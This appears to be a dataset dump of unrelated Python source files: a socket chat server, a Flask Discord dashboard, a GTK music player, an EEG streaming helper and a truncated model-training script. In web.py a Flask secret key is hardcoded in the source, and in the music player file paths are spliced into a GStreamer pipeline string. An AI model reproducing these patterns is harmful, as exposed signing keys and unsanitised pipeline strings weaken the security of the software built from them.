source
stringlengths
3
86
python
stringlengths
75
1.04M
multi.py
import socket
import os
from threading import *

Server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = "localhost"
port = 12345
seprator_token = "<NEP>"
disconectMessage = "!DISCONNECT"
threadCount = 0
clientSockets = set()  # every currently-connected client socket
nameaccess = {}        # username -> socket, used to resolve targeted messages

# Allow quick restart of the server on the same address/port.
Server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
    Server.bind((host, port))
except socket.error as e:
    print(str(e))
print("Server Listening on port " + str(port))
Server.listen(5)


def ServerListner(cs):
    """Per-client receive loop: parse each incoming frame and relay it.

    Frame format (after replacing the separator token with ": "):
        "<sender>: <name1>_<name2>_ <text>"   -> targeted message
        "<sender>: <text>"                    -> broadcast (no underscore)

    :param cs: the connected client socket this thread services
    """
    while True:
        try:
            msg = cs.recv(1024).decode()
        except Exception as e:
            print(f"Error: {e}")
            cs.close()
            break
        else:
            # Bug fix: an empty payload means the peer closed the connection;
            # the original fell through and crashed indexing the empty string.
            if not msg or msg == disconectMessage:
                cs.close()
                break
            msg = msg.replace(seprator_token, ": ")
            print(msg)

            # Sender name: everything before the first ':'.
            colon = msg.find(':')
            if colon == -1:
                # Robustness fix: a malformed frame without the separator
                # token is skipped instead of raising IndexError.
                continue
            finname = msg[:colon]
            counter = colon + 2  # skip over ": "

            # Recipient list: underscore-separated names right after the
            # separator; no underscore anywhere in the frame means broadcast.
            # (Limitation kept from the original: an underscore in the body
            # text also triggers targeted parsing.)
            if '_' not in msg:
                namestr = "all"
            else:
                namestr = ''
                while counter < len(msg) and msg[counter] != ' ':
                    namestr += msg[counter]
                    counter += 1
            print(namestr)

            # Remainder of the frame is the message body.
            msg2 = msg[counter:]

            # Resolve recipient names to sockets. The appended sentinel '_'
            # flushes the final name even when the client omitted the
            # trailing underscore (bug fix: last recipient used to be lost).
            names = []
            temp = ''
            for letter in namestr + '_':
                if letter != '_':
                    temp += letter
                    continue
                if temp == 'all':
                    # Bug fix: snapshot instead of aliasing the live set --
                    # the send loop below removes dead sockets from
                    # clientSockets, which would otherwise mutate the very
                    # set being iterated (RuntimeError).
                    names = list(clientSockets)
                    break
                if temp in nameaccess:
                    names.append(nameaccess[temp])
                elif temp:
                    print('mentioned user not present')
                temp = ''  # bug fix: unknown names no longer bleed into the next one

            msg = finname + ': ' + msg2
            if len(names) == 0:
                names = list(clientSockets)  # broadcast fallback (snapshot)
            for client_socket in names:
                if client_socket not in clientSockets:
                    print(f"{client_socket} has been terminated, can't send message")
                    continue
                try:
                    client_socket.send(msg.encode())
                except socket.error:
                    client_socket.close()
                    clientSockets.discard(client_socket)
    # Bug fix: discard() instead of remove() -- the socket may already have
    # been dropped by a failed send in another client's thread (KeyError).
    clientSockets.discard(cs)


while True:
    cs, caddr = Server.accept()
    print(f"[+] {caddr} connected to server.")
    clientSockets.add(cs)
    print(f"Total active connections: {len(clientSockets)}")
    welcome = f"Thanks for Connecting to the server {caddr}"
    cs.send(welcome.encode())
    # First message from a new client is its username.
    usname = cs.recv(1024).decode()
    print(usname)
    nameaccess[usname] = cs
    t = Thread(target=ServerListner, args=(cs,))
    t.daemon = True
    t.start()

# NOTE(review): unreachable after the infinite accept loop above -- kept
# as in the original; a KeyboardInterrupt handler would make it reachable.
for cs in clientSockets:
    cs.close()
Server.close()
web.py
# Dashboard under testing , Solve unauthorized for discord api error
from http import server
from threading import Thread
from shutil import ExecError
from django.shortcuts import render
from flask import *
import flask
from oauth import Oauth
from dotenv import load_dotenv
import os
import pymongo
from pymongo import MongoClient

load_dotenv()

# Creating and Configuring the app
app = Flask(__name__)
app.config['SECRET_KEY'] = b"%\xe0'\x01\xdeH\x8e\x85m|\xb3\xffCN\xc9g"

# Intilize Database
db_url = os.environ['tst']
cluster = MongoClient(db_url)
database = cluster["Jarvis"]
welcome_collection = database["welcome"]
leave_collection = database["leave"]
basedb = database['flaskapp']


# Server
@app.route('/')
def home():
    """Landing page."""
    return render_template('index.html')


@app.route('/oauth/discord')
def oauth():
    """Discord OAuth2 callback: exchange the code for a token and
    stash it in the session before sending the user to the dashboard."""
    # Authorization
    code = request.args.get("code")
    token = Oauth.get_access_token(code)
    session['token'] = token
    return redirect('/dashboard')


@app.route('/dashboard')
def dashboard():
    """Show the guilds shared between the logged-in user and the bot.

    Users without a session token are bounced to the Discord OAuth page.
    """
    if 'token' not in session:
        return redirect("https://discord.com/api/oauth2/authorize?client_id=916630347746250782&redirect_uri=https%3A%2F%2Ftessarect.prakarsh17.senarc.org%2F&response_type=code&scope=identify")
    user_data = Oauth.get_user_json(session.get('token'))
    user_guilds_data = Oauth.get_user_guild(session.get('token'))
    bot_guilds = Oauth.get_bot_guilds()
    mutual_bot_guilds = Oauth.get_mutual_guilds(user_guilds_data, bot_guilds)
    return render_template('dashboard.html', guilds=mutual_bot_guilds, userdata=user_data)


@app.route('/guild/guild_id=<guild_id>')
def guild(guild_id: int):
    """Render a single guild's settings page, or fall back to the dashboard
    when the guild data cannot be fetched."""
    user_data = Oauth.get_user_json(session.get('token'))
    guild_info = Oauth.get_guild_data(guild_id, session.get('token'))
    channels = Oauth.get_channel_from_guild(guild_id)
    if not guild_info:
        return redirect('/dashboard')
    return render_template('guilds.html', guild=guild_info, userdata=user_data, channel=channels)


@app.route("/forward/<guild_id>", methods=['POST'])
def move(guild_id: int):
    """Handle the settings-update form post for a guild.

    NOTE(review): on failure this prints the exception and implicitly
    returns None -- kept as in the original.
    """
    try:
        user_data = Oauth.get_user_json(session.get('token'))
        guild_info = Oauth.get_guild_data(guild_id, session.get('token'))
        channels = Oauth.get_channel_from_guild(guild_id)
        return render_template('update.html', guild=guild_info)
    except Exception as e:
        print(e)


def run():
    """Blocking entry point for the web server."""
    app.run(host='0.0.0.0', port=8080)


def keep_alive():
    """Run the web server in a background thread."""
    t = Thread(target=run)
    t.start()
logout.py
""" Quit a shell. """ import argparse _stash = globals()["_stash"] def logout(n): """ Quit StaSh :param n: exitcode for the shell (not implemented) :type n: int """ import threading t = threading.Thread(target=_stash.close, name="close thread") t.daemon = True t.start() if __name__ == "__main__": parser = argparse.ArgumentParser(description="Quits a shell") parser.add_argument("n", nargs="?", default=0, type=int, help="exit the shell with this code. Not implemented.") ns = parser.parse_args() logout(ns.n)
microframework.py
#!/usr/bin/env python3
import time
import threading
import json


class PereodicTask:
    """Repeat procedure/function in background (thread) with interval.

    (Class name kept as-is for backward compatibility; "Periodic" is the
    intended spelling.)

    Args:
        task (obj): procedure/function to repeat
        interval (int): interval in seconds (default 1)
    """

    def __init__(self, task, interval=1):
        self.interval = interval
        self.task = task
        self._running = True  # cooperative stop flag checked by the worker loop
        self.thread = threading.Thread(target=self._procedure, args=())
        self.thread.daemon = True
        self.thread.start()

    def _procedure(self):
        # Run the task, then sleep; exits once stop() clears the flag.
        while self._running:
            self.task()
            time.sleep(self.interval)

    def stop(self):
        """Stop execution; the worker thread exits after its current sleep.

        Bug fix: the original `del self` only removed the local reference
        and left the daemon thread looping forever. Clearing the loop flag
        actually terminates the repetition.
        """
        self._running = False


class JSONDB:
    """Load JSON file and use it as database (key: value).

    Args:
        filename (str): filename of DB, example: names.json
        rw (bool): defines if DB writable or read-only
    """

    def __init__(self, filename, rw=True):
        self.filename = filename
        self.rw = rw
        self.load()

    def load(self):
        """Parse JSON and load to memory."""
        with open(self.filename, 'r') as f:
            self.json_array = json.loads(f.read())

    def save(self):
        """Save modified DB to file; returns False for read-only DBs."""
        if not self.rw:
            return False
        with open(self.filename, 'w') as f:
            json.dump(self.json_array, f, sort_keys=True, indent=4)
        return True

    def get(self, option):
        """Get value from loaded DB (raises KeyError for unknown keys)."""
        return self.json_array[option]

    def update(self, option, new_value):
        """Change option value. Need save() to save to disk."""
        self.json_array[option] = new_value
realtime.py
import mne
import time
import threading

from .._handlers import properties
from abc import ABC, abstractmethod


class RealtimeError(Exception):
    pass


class Realtime(ABC):
    """Realtime abstract class: strategy interface for sending EEG data
    to a realtime visualization backend."""

    def __init__(self, options):
        # Required keys; other option keys are strategy-specific.
        self.channels = options["channels"]
        self.fs = options["fs"]

    @abstractmethod
    def start(self):
        pass

    @abstractmethod
    def stop(self):
        pass

    @abstractmethod
    def send_data(self, eeg):
        pass


# Registry of available Realtime strategy classes, keyed by class name.
realtime_strategies = {}
# Serializes calls into acq.show_realtime_data across visualizer threads.
qlock = threading.Lock()


def _visualize(acq, data, minimum_time=None):
    # Bug fix: hold the lock via a context manager so it is released even
    # when show_realtime_data raises (the bare acquire/release pair leaked
    # the lock on exception, deadlocking every later visualization).
    with qlock:
        acq.show_realtime_data(data, minimum_time)


def register_realtime(cls):
    """register a new strategy to realtime dictionary

    This function was made to be used as decorator on subclass of
    bcpy.realtimevisualization.Realtime

    Parameters
    ----------
    - cls : subclass of bcpy.realtimevisualization.Realtime
        subclass that will be register as an avaliable strategy

    Returns
    -------
    - subclass of bcpy.realtimevisualization.Realtime
        class passed on parameter

    Raises
    ------
    - RealtimeError
        raises when the class is already register on dictionary
    """
    if (cls.__name__ in realtime_strategies):
        # Bug fix: added the missing spaces around the class name in the
        # error message ("strategyFooalready register" previously).
        raise RealtimeError(
            "Realtime strategy " + cls.__name__ +
            " already register in realtime_strategies")
    realtime_strategies[cls.__name__] = cls
    return cls


def realtimevisualization(r, dataIter, options):
    """Send data to GUI

    Parameters
    ----------
    - r: `str` or `Realtime`
        Strategy to send data (a registered strategy name, or an instance)
    - dataIter: iterator
        source of data chunks to forward
    - options: dict
        options passed to the strategy constructor when `r` is a name

    Returns
    -------
    - data: `generator` of `[n_channels]`
    """
    props = properties.Properties()
    # (debug `print(1)` removed -- leftover development output)
    if isinstance(r, str):
        if not (r in realtime_strategies):
            raise RealtimeError("Unknown realtime strategy {r}".format(r=r))
        # TODO: Sync this
        acq = realtime_strategies[r](options)
        time.sleep(0.5)
        acq.start()
        props.realtime_inst = acq
        # Number of overlapping samples to drop from each chunk after the
        # first one.
        intersec = options["intersection"] - \
            1 if "intersection" in options else 0
        data = next(dataIter)
        yield (data)
        if (isinstance(data, mne.io.RawArray)):
            data = data.get_data().T
        threading.Thread(target=_visualize, args=(
            acq, data)).start()
        while True:
            time_start = time.time()
            data = next(dataIter)
            time_final = time.time()
            time_to_pull_data = time_final - time_start
            yield (data)
            if (isinstance(data, mne.io.RawArray)):
                data = data.get_data().T
            data_to_send = data[intersec:]
            threading.Thread(target=_visualize, args=(
                acq, data_to_send, time_to_pull_data)).start()
    elif isinstance(r, Realtime):
        # Caller supplied a ready-made strategy instance; just forward data.
        acq = r
        props.realtime_inst = acq
        while True:
            data = next(dataIter)
            yield (data)
            threading.Thread(target=_visualize, args=(acq, data)).start()
main_window_controller.py
import os
import os.path
import threading
import time

# imports the DAO
from music_wave.data_manager import DataManager
# imports the miner
from music_wave.miner import Miner
# imports the compiler for searchs inside the program
from music_wave.search_compiler import SearchCompiler
# imports rola class
from music_wave.rola import Rola
# imports tag window controller
from music_wave.tag_window_controller import TagWindowController
from music_wave.rola import Rola
# imports album window controller
from music_wave.album_window_controller import AlbumWindowController
# imports performer window controller
from music_wave.performer_window_controller import PerformerWindowController

import gi
gi.require_version('Gtk', '3.0')
gi.require_version('Gst', '1.0')
# import Gtk, GLib, GdkPixbuf, Gstreamer modules
from gi.repository import Gtk, GdkPixbuf, Gst, GLib
# imports mutagen module
import mutagen
# imports ID3 tags module from mutagen
from mutagen.id3 import ID3


class MainWindowController:
    # Global list for rolas representation
    data_list = []

    # Main Window Controller constructor
    def __init__(self):
        self.first_run = True
        self.read_from_database_activated = False
        home = os.getenv("HOME")
        path = str(home + "/Music")
        self.miner = Miner(path)
        self.data_manager = DataManager("", "rolas.db")
        self.search_compiler = SearchCompiler()
        self.rolas_representation = []
        # music_player holds [Gst player or None, is_playing flag, current path]
        self.music_player = []
        self.music_player.append(None)
        self.music_player.append(False)
        self.music_player.append("")
        self.tag_window_controller = TagWindowController()
        self.album_window_controller = AlbumWindowController()
        self.performer_window_controller = PerformerWindowController()
        self.performer_window_controller.start()
        self.builder = Gtk.Builder()
        self.builder.add_from_file("resources/main.glade")
        self.main_window = self.builder.get_object("main_window")
        self.liststore = self.builder.get_object("liststore")
        self.filter = self.liststore.filter_new()
        self.treeview = self.builder.get_object("treeview")
        self.treeview.set_model(self.filter)
        self.title_label = self.builder.get_object("title_label")
        self.album_label = self.builder.get_object("album_label")
        self.performer_label = self.builder.get_object("performer_label")
        self.imageview = self.builder.get_object("imageview")
        self.searchentry = self.builder.get_object("searchentry")
        loading_builder = Gtk.Builder()
        loading_builder.add_from_file("resources/loading.glade")
        self.loading_window = loading_builder.get_object("loading_window")
        self.loading_label = loading_builder.get_object("loading_label")
        about_builder = Gtk.Builder()
        about_builder.add_from_file("resources/about.glade")
        self.about_window = about_builder.get_object("about_window")
        tag_builder = Gtk.Builder()
        tag_builder.add_from_file("resources/tag.glade")
        self.columns = ["Title", "Album", "Performer", "Genre", "Path", 0]
        handlers = {
            "exit": Gtk.main_quit,
            "mine": (self.on_load_button_clicked),
            "about": (lambda widget: self.about_window.show()),
            "tag": (lambda widget: self.trigger_tag_window()),
            "album": (lambda widget: self.trigger_album_window()),
            "performer": (lambda widget: self.trigger_performer_window()),
            "search": (self.on_search_entry_activated)
        }
        self.builder.connect_signals(handlers)
        self.tree_selection = self.treeview.get_selection()
        self.tree_selection.set_mode(Gtk.SelectionMode.SINGLE)
        self.tree_selection.connect("changed", self.on_selected_row)
        play_button = self.builder.get_object("play_button")
        play_button.connect("clicked", self.play_song)
        pause_button = self.builder.get_object("pause_button")
        pause_button.connect("clicked", self.pause_song)
        self.shown_rows = []

    # Visibility callback for the tree filter: an empty shown_rows list
    # means "show everything"; otherwise only rows whose id is listed.
    def search_filter_func(self, model, iter, data):
        if self.shown_rows == []:
            return True
        else:
            return model[iter][5] in self.shown_rows

    # Method that hides an specific window received as argument
    def hide_window(self, window, event):
        window.hide()
        return True

    # Method that plays a song using Gstreamer
    def play_song(self, caller):
        try:
            (model, iter) = self.tree_selection.get_selected()
            path = model.get_value(iter, 4)
        except:
            return
        if self.music_player[1] == False or self.music_player[2] != path:
            # A different (or no) song is loaded: build a fresh pipeline.
            self.music_player[2] = path
            path = path.replace(" ", "\ ")
            if self.music_player[0] != None:
                self.music_player[0].set_state(Gst.State.NULL)
            pipeline = "filesrc location=" + path + \
                " ! decodebin ! audioconvert ! autoaudiosink"
            player = Gst.parse_launch(pipeline)
            self.music_player[0] = player
            player.set_state(Gst.State.PLAYING)
            self.music_player[1] = True
        else:
            # Same song, just resume playback.
            self.music_player[0].set_state(Gst.State.PLAYING)

    # Method that pauses a song using Gstreamer
    def pause_song(self, caller):
        try:
            player = self.music_player[0]
            player.set_state(Gst.State.PAUSED)
        except:
            pass

    # Loads the music library when the "load" button is clicked
    def on_load_button_clicked(self, caller):
        # Re-mining always starts from a clean database.
        if os.path.isfile("rolas.db"):
            os.remove("rolas.db")
        self.run_load_music_task(self.loading_window)

    # Filters the view from the search entry content when activated
    def on_search_entry_activated(self, caller):
        search = self.searchentry.get_text()
        if search == "":
            self.shown_rows = []
            self.filter.refilter()
        else:
            command = self.search_compiler.compile(search)
            identifiers = self.data_manager.execute_and_get_ids(command)
            self.shown_rows = identifiers
            self.filter.refilter()
            self.searchentry.set_text("")

    # Gets the music information, while shows an loading window
    def run_load_music_task(self, loading_window):
        loading_window.show()

        def thread_run():
            fetch_info = self.fetch_info()
            GLib.idle_add(cleanup, fetch_info)

        def cleanup(fetch_info):
            loading_window.hide()
            thread.join()
            rolas_representation_list = fetch_info
            listmodel = Gtk.ListStore(str, str, str, str, str, int)
            for item in rolas_representation_list:
                listmodel.append(item)
            self.filter = listmodel.filter_new()
            self.filter.set_visible_func(self.search_filter_func)
            self.treeview.set_model(self.filter)
            # for row in self.filter:
            #     row[2] = "alb"

        thread = threading.Thread(target=thread_run)
        thread.start()

    # Retrieves the music info either only from the database or from both
    # the database and the miner object.
    def fetch_info(self):
        if self.read_from_database_activated:
            self.read_from_database_activated = False
        else:
            self.data_manager.create_database()
            self.mine()
            self.data_manager.populate_database(rolas=self.rolas,
                                                performers=self.performers,
                                                albums=self.albums)
        db_rolas = self.data_manager.get_rolas()
        db_albums = self.data_manager.get_albums()
        db_performers = self.data_manager.get_performers()
        rolas_representation = []
        for rola in db_rolas.values():
            representation = []
            representation.append(rola.get_title().replace("´", "'"))
            representation.append(
                self.data_manager.get_album(rola.get_album_id())[2])
            representation.append(
                self.data_manager.get_performer(rola.get_performer_id())[2])
            representation.append(rola.get_genre())
            representation.append(rola.get_path())
            representation.append(rola.get_id())
            rolas_representation.append(representation)
        if self.first_run:
            self.data_list = rolas_representation
        else:
            return rolas_representation

    # Mines from the Music directory, and updates the loading window label
    # to show the actual progress
    def mine(self):
        def set_label_text(text):
            self.loading_label.set_text(text)

        self.miner.setup()
        self.miner.walk()
        for path in self.miner.get_paths():
            self.miner.mine(path)
            GLib.idle_add(set_label_text,
                          (str(self.miner.get_processed_files()) + " / " +
                           str(self.miner.get_total_files())))
        GLib.idle_add(set_label_text, "Loading music ...")
        self.rolas = self.miner.get_rolas()
        self.albums = self.miner.get_albums()
        self.performers = self.miner.get_performers()

    # Responds to a selected row signal in TreeView.
    def on_selected_row(self, caller):
        try:
            (model, iter) = self.tree_selection.get_selected()
            title = model.get_value(iter, 0)
            album = model.get_value(iter, 1)
            performer = model.get_value(iter, 2)
            path = model.get_value(iter, 4)
            self.title_label.set_text(title)
            self.album_label.set_text(album)
            self.performer_label.set_text(performer)
            audio = ID3(path)
            file = mutagen.File(path)
            tags = mutagen.mp3.Open(path)
        except:
            return
        # Try the common 'APIC:' artwork frame first, then scan every APIC*
        # frame, and finally fall back to the placeholder image.
        try:
            artwork_data = file.tags['APIC:'].data
            loader = GdkPixbuf.PixbufLoader.new()
            loader.set_size(120, 120)
            loader.write(artwork_data)
            loader.close()
            pixbuf = loader.get_pixbuf()
            self.imageview.set_from_pixbuf(pixbuf)
        except:
            try:
                artwork_exists = False
                for tag in tags:
                    if tag.startswith("APIC"):
                        artwork_data = tags[tag].data
                        artwork_exists = True
                        break
                if artwork_exists:
                    loader = GdkPixbuf.PixbufLoader.new()
                    loader.set_size(120, 120)
                    loader.write(artwork_data)
                    loader.close()
                    pixbuf = loader.get_pixbuf()
                    self.imageview.set_from_pixbuf(pixbuf)
                else:
                    self.imageview.set_from_file("resources/music.png")
            except:
                self.imageview.set_from_file("resources/music.png")

    # Launches the tag editor window, with the selected row info from the treeview
    def trigger_tag_window(self):
        try:
            (model, iter) = self.tree_selection.get_selected()
            album = model.get_value(iter, 1)
            performer = model.get_value(iter, 2)
            path = model.get_value(iter, 4)
            id = model.get_value(iter, 5)
        except:
            return
        rola = self.data_manager.get_rola(id)
        self.tag_window_controller.set_id(id)
        self.tag_window_controller.set_album(album)
        self.tag_window_controller.set_performer(performer)
        self.tag_window_controller.set_path(path)
        title = rola[4]
        track = str(rola[5])
        year = str(rola[6])
        genre = rola[7]
        self.tag_window_controller.set_treemodel(model)
        self.tag_window_controller.set_treeiter(iter)
        self.tag_window_controller.set_title_entry_text(title)
        self.tag_window_controller.set_track_entry_text(track)
        self.tag_window_controller.set_year_entry_text(year)
        self.tag_window_controller.set_genre_entry_text(genre)
        self.tag_window_controller.show_window()
        # self.tag_window_controller.set_lambda(lambda: self.run_load_music_task(self.loading_window))

    # Launches the album editor window, with the selected row info from the treeview
    def trigger_album_window(self):
        try:
            (model, iter) = self.tree_selection.get_selected()
            album_name = model.get_value(iter, 1)
        except:
            return
        id = model.get_value(iter, 5)
        rola = self.data_manager.get_rola(id)
        album_id = rola[2]
        self.album_window_controller.set_id(album_id)
        self.album_window_controller.set_old_name(album_name)
        album = self.data_manager.get_album(album_id)
        name = album[2]
        year = album[3]
        self.album_window_controller.set_filter(self.filter)
        self.album_window_controller.set_name_entry_text(name)
        self.album_window_controller.set_year_entry_text(str(year))
        self.album_window_controller.show_window()

    # Launches the performer editor window, with the selected row info from the treeview
    def trigger_performer_window(self):
        try:
            (model, iter) = self.tree_selection.get_selected()
            performer_name = model.get_value(iter, 2)
        except:
            return
        id = model.get_value(iter, 5)
        rola = self.data_manager.get_rola(id)
        performer_id = rola[1]
        self.performer_window_controller.set_id(performer_id)
        self.performer_window_controller.set_old_name(performer_name)
        performer = self.data_manager.get_performer(performer_id)
        type = performer[1]
        name = performer[2]
        self.performer_window_controller.set_filter(self.filter)
        self.performer_window_controller.clear_entries()
        # Performer type selects which sub-form gets populated:
        # 0 = person, 1 = group, 2 = unknown.
        if type == 0:
            self.performer_window_controller.set_type("Person")
            person = self.data_manager.get_person(name)
            self.performer_window_controller.set_stage_entry_text(person[1])
            self.performer_window_controller.set_real_entry_text(person[2])
            self.performer_window_controller.set_birth_entry_text(person[3])
            self.performer_window_controller.set_death_entry_text(person[4])
        elif type == 1:
            self.performer_window_controller.set_type("Group")
            group = self.data_manager.get_group(name)
            self.performer_window_controller.set_name_entry_text(group[1])
            self.performer_window_controller.set_start_entry_text(group[2])
            self.performer_window_controller.set_end_entry_text(group[3])
        elif type == 2:
            self.performer_window_controller.set_type("Unknown")
            self.performer_window_controller.set_name_entry_text(name)
        self.performer_window_controller.show_window()

    # Starts the Main Window Controller object.
    def start(self):
        Gst.init(None)
        self.mine()
        self.main_window.show_all()
        # Fills the database; an existing rolas.db is read instead of mined.
        if os.path.isfile("rolas.db"):
            self.read_from_database_activated = True
        self.run_load_music_task(self.loading_window)
        self.first_run = False
        self.about_window.connect("delete-event", self.hide_window)
        self.about_window.connect("destroy", self.hide_window)
        for representation in self.data_list:
            self.liststore.append(representation)
        for index, column in enumerate(self.columns):
            # cellrenderer to render the text
            cell = Gtk.CellRendererText()
            # the column is created
            col = Gtk.TreeViewColumn(column, cell, text=index)
            # and it is appended to the treeview
            if column == "Path" or column == 0:
                col.set_visible(False)
            self.treeview.append_column(col)
train_fr_dist_randomseed.py
# coding: utf-8 import argparse import time import math import os, sys import itertools import numpy as np import torch import torch.nn as nn import torch.optim as optim from data_utils import get_lm_corpus from mem_transformer_fr_randomseed import MemTransformerLM_fr from utils.exp_utils import create_exp_dir from utils.data_parallel import BalancedDataParallel from torch.autograd import Variable from sharedtensor import SharedTensor import multiprocessing as mp GPUS = [0, 1, 2, 3] torch.backends.cudnn.deterministic = True def main(args, logging): device = torch.device('cuda' if args.cuda else 'cpu') ############################################################################### # Load data ############################################################################### corpus = get_lm_corpus(args.data, args.dataset) ntokens = len(corpus.vocab) args.n_token = ntokens eval_batch_size = 10 tr_iter = corpus.get_iterator('train', args.batch_size, args.tgt_len, device=device, ext_len=args.ext_len) va_iter = corpus.get_iterator('valid', eval_batch_size, args.eval_tgt_len, device=device, ext_len=args.ext_len) te_iter = corpus.get_iterator('test', eval_batch_size, args.eval_tgt_len, device=device, ext_len=args.ext_len) # adaptive softmax / embedding cutoffs, tie_projs = [], [False] if args.adaptive: assert args.dataset in ['wt103', 'lm1b'] if args.dataset == 'wt103': cutoffs = [20000, 40000, 200000] tie_projs += [True] * len(cutoffs) elif args.dataset == 'lm1b': cutoffs = [60000, 100000, 640000] tie_projs += [False] * len(cutoffs) ############################################################################### # Build the model ############################################################################### def init_weight(weight): if args.init == 'uniform': nn.init.uniform_(weight, -args.init_range, args.init_range) elif args.init == 'normal': nn.init.normal_(weight, 0.0, args.init_std) def init_bias(bias): nn.init.constant_(bias, 0.0) def weights_init(m): classname = 
m.__class__.__name__ if classname.find('Linear') != -1: if hasattr(m, 'weight') and m.weight is not None: init_weight(m.weight) if hasattr(m, 'bias') and m.bias is not None: init_bias(m.bias) elif classname.find('AdaptiveEmbedding') != -1: if hasattr(m, 'emb_projs'): for i in range(len(m.emb_projs)): if m.emb_projs[i] is not None: nn.init.normal_(m.emb_projs[i], 0.0, args.proj_init_std) elif classname.find('Embedding') != -1: if hasattr(m, 'weight'): init_weight(m.weight) elif classname.find('ProjectedAdaptiveLogSoftmax') != -1: if hasattr(m, 'cluster_weight') and m.cluster_weight is not None: init_weight(m.cluster_weight) if hasattr(m, 'cluster_bias') and m.cluster_bias is not None: init_bias(m.cluster_bias) if hasattr(m, 'out_projs'): for i in range(len(m.out_projs)): if m.out_projs[i] is not None: nn.init.normal_(m.out_projs[i], 0.0, args.proj_init_std) elif classname.find('LayerNorm') != -1: if hasattr(m, 'weight'): nn.init.normal_(m.weight, 1.0, args.init_std) if hasattr(m, 'bias') and m.bias is not None: init_bias(m.bias) elif classname.find('TransformerLM') != -1 or classname.find('TransformerLM_fr_begin_end') != -1 or classname.find('TransformerLM_fr_mid') != -1: if hasattr(m, 'r_emb'): init_weight(m.r_emb) if hasattr(m, 'r_w_bias'): init_weight(m.r_w_bias) if hasattr(m, 'r_r_bias'): init_weight(m.r_r_bias) if hasattr(m, 'r_bias'): init_bias(m.r_bias) def update_dropout(m): classname = m.__class__.__name__ if classname.find('Dropout') != -1: if hasattr(m, 'p'): m.p = args.dropout def update_dropatt(m): if hasattr(m, 'dropatt'): m.dropatt.p = args.dropatt models = MemTransformerLM_fr(args.num_splits, ntokens, args.n_layer, args.n_head, args.d_model, args.d_head, args.d_inner, args.dropout, args.dropatt, tie_weight=args.tied, d_embed=args.d_embed, div_val=args.div_val, tie_projs=tie_projs, pre_lnorm=args.pre_lnorm, tgt_len=args.tgt_len, ext_len=args.ext_len, mem_len=args.mem_len, cutoffs=cutoffs, same_length=args.same_length, attn_type=args.attn_type, 
clamp_len=args.clamp_len, sample_softmax=args.sample_softmax) for i, model in enumerate(models): model.apply(weights_init) if i == 0: model.word_emb.apply(weights_init) # ensure embedding init is not overridden by out_layer in case of weight sharing args.n_all_param = 0 args.n_nonemb_param = 0 for i in range(len(models)): args.n_all_param += sum([p.nelement() for p in models[i].parameters()]) if i == 0: args.n_nonemb_param += sum([p.nelement() for p in models[i].layers_begin.parameters()]) args.n_nonemb_param += sum([p.nelement() for p in models[i].layers_end.parameters()]) else: args.n_nonemb_param += sum([p.nelement() for p in models[i].layers.parameters()]) #### optimizer if args.optim.lower() == 'sgd': if args.sample_softmax > 0: assert args.sample_softmax>0, 'not implemented yet!' else: optimizers = [] for model in models: optimizer = optim.SGD(model.parameters(), lr=args.lr, momentum=args.mom) optimizers.append(optimizer) if args.optim.lower() == 'adam': if args.sample_softmax > 0: assert args.sample_softmax>0, 'not implemented yet!' else: optimizers = [] for model in models: optimizer = optim.Adam(model.parameters(), lr=args.lr) optimizers.append(optimizer) #### scheduler if args.scheduler == 'cosine': # here we do not set eta_min to lr_min to be backward compatible # because in previous versions eta_min is default to 0 # rather than the default value of lr_min 1e-6 schedulers = [] for optimizer in optimizers: scheduler = optim.lr_scheduler.CosineAnnealingLR(optimizer, args.max_step, eta_min=args.eta_min) # should use eta_min arg schedulers.append(scheduler) if args.sample_softmax > 0: scheduler_sparse = optim.lr_scheduler.CosineAnnealingLR(optimizer_sparse, args.max_step, eta_min=args.eta_min) # should use eta_min arg elif args.scheduler == 'inv_sqrt': # originally used for Transformer (in Attention is all you need) def lr_lambda(step): # return a multiplier instead of a learning rate if step == 0 and args.warmup_step == 0: return 1. else: return 1. 
/ (step ** 0.5) if step > args.warmup_step \ else step / (args.warmup_step ** 1.5) scheduler = optim.lr_scheduler.LambdaLR(optimizer, lr_lambda=lr_lambda) elif args.scheduler == 'dev_perf': scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer, factor=args.decay_rate, patience=args.patience, min_lr=args.lr_min) if args.sample_softmax > 0: scheduler_sparse = optim.lr_scheduler.ReduceLROnPlateau(optimizer_sparse, factor=args.decay_rate, patience=args.patience, min_lr=args.lr_min) elif args.scheduler == 'constant': pass logging('=' * 100) for k, v in args.__dict__.items(): logging(' - {} : {}'.format(k, v)) logging('=' * 100) logging('#params = {}'.format(args.n_all_param)) logging('#non emb params = {}'.format(args.n_nonemb_param)) ############################################################################### # Training code ############################################################################### shm_lists = [] shape = [args.tgt_len, args.batch_size, args.d_model] for i in range(args.num_splits): shm_data = SharedTensor(shape) shm_grad = SharedTensor(shape) shm_lists.append(shm_data) shm_lists.append(shm_grad) # eval shm_lists shm_lists_eval = [] shape = [args.eval_tgt_len, eval_batch_size, args.d_model] for i in range(args.num_splits): shm_data = SharedTensor(shape) shm_grad = SharedTensor(shape) shm_lists_eval.append(shm_data) shm_lists_eval.append(shm_grad) # Loop over epochs. 
processes = [] for i in range(args.num_splits): if i == 0: p = mp.Process(target=train_begin_end, args=(models[i], optimizers[i], tr_iter, va_iter, shm_lists, shm_lists_eval, i, schedulers[i], logging, args)) else: p = mp.Process(target=train_mid, args=(models[i], optimizers[i], tr_iter.n_batch, va_iter.n_batch, shm_lists, shm_lists_eval, i, schedulers[i], args)) p.start() processes.append(p) for p in processes: p.join() def train_mid(model, optimizer, n_batch, n_batch_val, shm_lists, shm_lists_eval, split_id, scheduler, args): model.cuda(GPUS[split_id]) train_step = 0 # Turn on training mode which enables dropout. for epoch in itertools.count(start=1): model.train() mems = tuple() #for batch, (data, target, seq_len) in enumerate(train_iter): for batch in range(n_batch): model.zero_grad() # forward hidden = shm_lists[2*(split_id-1)].recv() #print(split_id, ' get hidden from ', 2*(split_id-1) , hidden.norm()) if args.cuda: hidden = hidden.cuda(GPUS[split_id]) hidden = Variable(hidden.data) with torch.no_grad(): ret = model.forward(hidden, *mems) hidden, mems = ret[0], ret[1:] shm_lists[2*split_id].send(hidden.data.cpu()) #print(split_id, ' sent hidden to ', 2*(split_id) , hidden.norm()) # backward model.fr_backward() if model.delay < 0: grad = model.get_grad() shm_lists[2*(split_id-1)+1].send(grad.cpu()) #print(split_id, ' sent grad to ', 2*(split_id-1)+1 , grad.norm()) torch.nn.utils.clip_grad_norm_(model.parameters(), args.clip) 